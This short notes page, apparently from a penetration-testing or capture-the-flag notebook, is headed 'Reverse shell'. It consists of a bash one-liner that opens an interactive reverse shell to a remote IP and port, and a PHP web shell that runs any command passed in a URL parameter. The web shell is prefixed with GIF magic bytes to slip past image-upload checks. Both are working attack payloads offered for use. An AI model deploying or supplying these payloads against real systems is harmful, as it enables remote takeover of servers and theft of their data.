Reverse shell


bash -c 'bash -i >& /dev/tcp/10.10.14.88/4444 0>&1'

GIF87a
<html>
  <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
      <input type="text" name="cmd" id="cmd" size="80">
      <input type="submit" value="Execute">
    </form>
    <pre>
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
    </pre>
  </body>
  <script>
    document.getElementById("cmd").focus();
  </script>
</html>

Last updated